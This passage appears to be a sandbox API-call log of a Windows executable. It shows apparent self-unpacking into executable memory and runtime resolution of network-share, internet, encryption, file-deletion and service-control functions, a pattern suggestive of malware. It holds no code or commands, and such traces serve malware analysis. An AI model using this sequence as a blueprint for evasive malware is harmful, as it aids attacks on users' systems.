GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.654] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.655] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.655] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.655] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.655] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.655] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.655] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.655] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.655] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0056.293] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0056.293] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0056.293] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0056.294] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0056.294] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0056.294] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0056.294] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0056.294] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0056.295] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0056.300] Module32First (hSnapshot=0x58, lpme=0x18edd8) returned 1 [0056.303] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x6090000 [0056.364] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0056.364] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0056.364] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0056.364] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0056.364] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0056.365] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0056.365] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0056.365] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0056.365] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0056.365] SetErrorMode (uMode=0x400) returned 0x0 [0056.365] SetErrorMode (uMode=0x0) returned 0x400 [0056.365] GetVersionExA (in: lpVersionInformation=0x18dd08*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18dd08*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0056.365] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x61f0000 [0056.390] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ed90 | out: lpflOldProtect=0x18ed90*=0x2) returned 1 [0056.408] VirtualFree (lpAddress=0x61f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.417] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0056.417] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0056.417] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0056.417] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0056.417] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0056.417] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0056.417] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x755b0000 [0057.502] GetProcAddress (hModule=0x755b0000, lpProcName="WNetOpenEnumW") returned 0x755b2f06 [0057.502] GetProcAddress (hModule=0x755b0000, lpProcName="WNetEnumResourceW") returned 0x755b3058 [0057.502] GetProcAddress (hModule=0x755b0000, lpProcName="WNetCloseEnum") returned 0x755b2dd6 [0057.502] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0063.549] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0063.550] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0063.550] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0063.550] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0063.550] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0063.550] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0063.550] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0063.550] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75570000 [0064.050] GetProcAddress (hModule=0x75570000, lpProcName="timeGetTime") returned 0x755726e0 [0064.050] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0064.050] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0064.050] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0064.050] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0064.050] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0064.050] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0064.051] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0064.051] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0064.051] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0064.051] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0064.051] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0064.051] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0064.051] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0064.051] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0064.051] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0064.051] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0064.051] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0064.051] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0064.052] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0064.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0064.054] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0064.055] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0064.055] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0064.055] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0064.055] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0064.055] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0064.055] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0064.055] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0064.055] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0064.055] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0064.056] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0064.056] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0064.056] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0064.056] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0064.056] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0064.056] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0064.056] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0064.056] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0064.056] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0064.056] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0064.057] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0064.058] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0064.059] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0064.059] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0064.059] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0064.059] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0064.059] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0064.072] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0064.072] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0064.072] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0064.072] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0064.072] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0064.072] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0064.073] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0064.074] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0064.075] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0064.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0064.077] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0064.077] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0064.077] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0064.078] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0064.078] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0064.078] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0064.078] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0064.078] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0064.078] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0064.078] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0064.078] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0064.078] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0064.078] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0064.078] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0064.079] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0064.079] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0064.079] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0064.079] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0064.079] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0064.079] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0064.079] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0064.079] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0064.079] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0064.080] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0064.080] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0064.080] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0064.080] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0064.080] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0064.080] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0064.080] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0064.080] GetProcAddress (hModule=0x77710000, 